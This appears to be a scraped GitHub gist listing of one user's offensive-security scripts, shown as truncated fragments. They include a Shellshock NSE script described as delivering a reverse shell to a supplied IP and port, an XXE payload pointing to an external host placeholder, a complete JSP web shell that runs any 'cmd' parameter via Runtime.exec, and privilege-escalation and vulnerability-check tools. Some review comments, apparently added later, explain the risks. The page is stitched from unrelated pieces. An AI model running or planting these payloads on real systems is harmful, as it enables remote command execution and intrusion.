sh1n0b1 / reddit.py
Created June 12, 2014 04:40
Python Script to parse XSS payload from reddit by Peter Kim
#!/usr/bin/env python
#Reddit XSS
#Author: Cheetz
import urllib2, sys
import logging, os, re, sys, urllib, string
from optparse import OptionParser
from urlparse import urlparse
class Lookup:
def run(self,url):
sh1n0b1 / a04c152139d85507cac88fcc4aaf9ca9
Last active August 29, 2015 14:05
a04c152139d85507cac88fcc4aaf9ca9
# Session record written as Perl assignments: sets the 'ip' and 'user'
# fields of %sesshash.
# NOTE(review): how this file is consumed is not visible here. If a script
# loads it by evaluating it (do/require/eval), then whoever can write or
# choose the file controls code, not just data -- confirm against the loader.
# A data-only format parsed field by field would avoid that.
$sesshash{'ip'} = '68.227.245.145';
$sesshash{'user'} = 'admin';
#!/usr/bin/perl -w
use CGI;
use Digest::MD5 qw(md5_hex);
# Request object used below to read the cookie and the query/form parameters.
$cgi = new CGI;
# Presumably the directory holding session files; /tmp is typically writable
# by every local account, so files there are not trustworthy by location alone.
$SESSDIR = "/tmp/";
# Taken verbatim from the client-supplied "diagsess" cookie.
# NOTE(review): no validation is visible in this excerpt. If this value is
# later joined to $SESSDIR to open a file, it must first be checked against a
# strict pattern (no '/', no '..'; the md5_hex import suggests fixed-length hex
# identifiers -- confirm) so the client cannot select an arbitrary path.
$sessfile = $cgi->cookie("diagsess");
# "arg" and "action" request parameters, equally client-controlled; they need
# allow-list validation before reaching any file, shell or eval operation.
$arg0 = $cgi->param("arg");
$action = $cgi->param("action");
sh1n0b1 / http-vuln-cve-2014-6271.nse
Created October 6, 2014 09:15
NSE script for Shellshock vulnerability, CVE-2014-6271
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"
description = [[
NSE script that delivers you a reverse shell using CVE-2014-6271.
Usage: ./nmap -p80 --script http-vuln-cve-2014-6271.nse
--script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status
<ip> -d
#!/bin/python
import sys
import socket
import time
import struct
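# Usage guard: the tool needs at least a target host on the command line.
if len(sys.argv) < 2:
    # A single parenthesised argument prints the same text under the Python 2
    # print statement and the Python 3 print function.
    print("Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0]))
    # sys.exit() rather than quit(): quit() is injected by the site module for
    # interactive sessions and is undefined under `python -S` or in frozen
    # builds. The exit status stays 0, exactly as quit() produced.
    sys.exit()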
<html>
<title>PHP Source Analyzer by Delicon</title>
<head>
<script language="JavaScript">
function mouseDown_Action(c_id) {
var obj = document.getElementById(c_id);
if (obj.style.visibility == 'hidden') {
obj.style.visibility = 'visible';
obj.style.position = 'static';
} else {
sh1n0b1 / CVE-2015-0235.c
Created January 28, 2015 06:34
CVE-2015-0235
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <gnu/libc-version.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
sh1n0b1 / XXE.php
Last active July 4, 2017 04:17
XML External Entity Injection
<?php
// XML document whose DOCTYPE declares a parameter entity (%dtd) with a SYSTEM
// URL and then references it; <IP_ADDRESS> is a placeholder left by the author.
// A receiving parser only fetches that URL when external DTD / entity loading
// is enabled, so the server-side fix is to reject DOCTYPE declarations or
// disable external entity resolution in the XML parser.
// NOTE(review): presumably sent as the request body; the send itself is
// outside this excerpt.
$xml_data ='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottage [
<!ENTITY % dtd SYSTEM "http://<IP_ADDRESS>">
%dtd;]>';
// Commented-out alternative kept by the author: a general entity with a SYSTEM URL.
//<!ENTITY xxe SYSTEM "http://target/">]>
// URL the cURL handle is initialised with; "target" is a placeholder host.
$URL = "https://target/";
$ch = curl_init($URL);
// Sets the request's Content-Type header to text/html.
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/html'));
<%--
  Review note: the scriptlet below is wrapped in an HTML comment, but a JSP
  container evaluates scriptlet tags on the server before the page is sent,
  so the HTML comment markers do not disable it; they only hide its output
  from the rendered page. The code passes the "cmd" request parameter
  directly to Runtime.getRuntime().exec() and writes the process output into
  the response, so any client that can request this page runs commands with
  the application server's privileges. A file like this on a server should be
  handled as a web shell. For detection, search JSP sources for
  request.getParameter(...) flowing into Runtime.exec or ProcessBuilder,
  including inside HTML comment blocks, and review access logs for requests
  carrying a cmd parameter.
--%>
<html>
<head>
<!-- <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null )
{ out.println(disr); disr = dis.readLine(); } } %>
-->
</head>
<body>
</body>
</html>
sh1n0b1 / linuxprivchecker.py
Created July 13, 2015 23:36
linuxprivchecker.py -- a Linux Privilege Escalation Check Script
#!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.